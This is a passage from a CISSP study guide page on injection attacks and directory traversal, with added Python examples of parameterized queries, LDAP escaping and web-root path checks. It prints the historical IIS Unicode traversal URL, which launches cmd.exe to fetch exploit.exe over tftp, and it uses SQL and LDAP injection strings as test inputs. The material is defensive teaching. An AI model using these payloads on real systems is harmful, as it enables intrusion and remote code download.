Page 616 - (ISC)² CISSP Certified Information Systems Security Professional Official Study Guide
the programming language or execution environment.
Ultimately, SQL injection is a vulnerability of the script used to handle the interaction between a front end (typically a web server) and the backend database. If the script was written defensively and included code to escape (invalidate or reject) metacharacters, SQL injection would not be possible.
LDAP injection is a variation of an input injection attack; however, the focus of the attack is on the back end of an LDAP directory service rather than a database server. If a web server front end uses a script to craft LDAP statements based on input from a user, then LDAP injection is potentially a threat. Just as with SQL injection, sanitization of input and defensive coding are essential to eliminate this threat.
XML injection is another variant of SQL injection, where the backend target is an XML application. Again, input sanitization is necessary to eliminate this threat.
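The defensive coding the three paragraphs above call for, shown as an added example (not from the study guide): a login lookup built by string concatenation sits beside the same lookup using bound parameters, and an RFC 4515 escaping routine neutralizes the metacharacters an LDAP search filter treats specially. The users table, its two rows and the function names are constructed for this illustration.

```python
import sqlite3


def make_db():
    """Constructed sample database: a users table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_unsafe(conn, username, password):
    """Vulnerable form: input is concatenated into the statement text, so a
    single quote in the input changes the meaning of the query."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, username, password):
    """Defensive form: placeholders keep user data out of the SQL text, so the
    driver never has to escape metacharacters and none of them are parsed."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def ldap_escape_filter_value(value):
    """Escape a value for use inside an LDAP search filter (RFC 4515).

    The characters that carry meaning in a filter are replaced by their
    backslash-hex form, so '*)(uid=*' cannot close the filter early or widen
    the match."""
    escapes = {
        "\\": r"\5c",
        "*": r"\2a",
        "(": r"\28",
        ")": r"\29",
        "\x00": r"\00",
    }
    return "".join(escapes.get(ch, ch) for ch in value)


def build_ldap_filter(username):
    """Build a lookup filter with the user-supplied part escaped."""
    return "(&(objectClass=person)(uid=%s))" % ldap_escape_filter_value(username)


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", login_unsafe(db, "alice", "' OR '1'='1"))   # both users
    print("safe:  ", login_safe(db, "alice", "' OR '1'='1"))     # no rows
    print(build_ldap_filter("*)(uid=*"))
```

With the password `' OR '1'='1`, the concatenated query returns every row because the quote terminates the literal and the `OR` is evaluated as SQL; the parameterized query compares the whole string against the password column and matches nothing. The LDAP routine escapes rather than rejects, which is the usual choice when the value must still be searchable.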
Directory Traversal/Command Injection
A directory traversal is an attack that enables an attacker to jump out of the web root directory structure and into any other part of the filesystem hosted by the web server’s host OS. A common, but historical, version of this attack was against IIS 4.0, hosted by Windows NT 4.0 Server. The attack used a modified URL to directory-traverse out of the web root, into the main OS folders, in order to access the command prompt executable. Here’s an example:
http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+get+exploit.exe
This URL includes a Unicode equivalent of the “change to parent directory” command, which is ../ in ASCII, and also notice it uses the metacharacter of percent (%). This URL not only performed directory traversal but also granted the attacker the ability to
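The server-side check that would have stopped the request above, as an added example rather than code from the study guide: the request path is percent-decoded exactly once under strict UTF-8 (so an overlong sequence such as %c0%af is rejected instead of being accepted as a slash, which is the decoder mistake IIS made), backslashes are treated as separators the way a Windows host would, and the canonicalized result must still lie under the web root. The web root /var/www, the function names and the sample request paths are constructed for this illustration; a real deployment would additionally resolve symbolic links before the containment check.

```python
import posixpath
from urllib.parse import unquote_to_bytes


class TraversalError(ValueError):
    """Raised for any request path that must not be served."""


def decode_request_path(raw_path):
    """Percent-decode once and require well-formed UTF-8.

    Strict UTF-8 decoding refuses overlong forms such as %c0%af, so an
    encoded '/' that is not the literal %2f never becomes a separator."""
    raw_bytes = unquote_to_bytes(raw_path)
    try:
        decoded = raw_bytes.decode("utf-8")  # strict: overlong bytes raise
    except UnicodeDecodeError as exc:
        raise TraversalError("malformed percent-encoding: %s" % exc) from None
    if "\x00" in decoded:
        raise TraversalError("NUL byte in request path")
    return decoded


def resolve_under_webroot(webroot, raw_path):
    """Map a request path onto the filesystem below webroot (a normalized
    absolute POSIX path, constructed here) or raise TraversalError."""
    path_only = raw_path.split("?", 1)[0]  # the query string is not a path
    decoded = decode_request_path(path_only)
    # Windows hosts accept '\' as a separator, so normalize it before the
    # '..' check rather than letting '..\' slip past a '/'-only check.
    decoded = decoded.replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    # Containment check on the canonical path: any '..' that climbed above
    # the web root shows up here as a different common prefix.
    if posixpath.commonpath([webroot, candidate]) != webroot:
        raise TraversalError("path escapes web root: %s" % candidate)
    return candidate


def is_safe_request(webroot, raw_path):
    """True when the request maps to a file under webroot, else False."""
    try:
        resolve_under_webroot(webroot, raw_path)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # Constructed request paths: a plain file, a plain '..' climb, the
    # overlong-UTF-8 climb from the example above, and a backslash climb.
    for req in [
        "/scripts/index.html",
        "/scripts/../../winnt/system32/cmd.exe",
        "/scripts/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir",
        "/scripts/..\\..\\winnt/system32/cmd.exe",
    ]:
        print(is_safe_request("/var/www", req), req)
```

Decoding once is deliberate: a doubly encoded `%252e%252e` decodes to the literal filename `%2e%2e`, which stays inside the web root and is simply not found, whereas a second decoding pass would turn it into `..` after the containment check had already run.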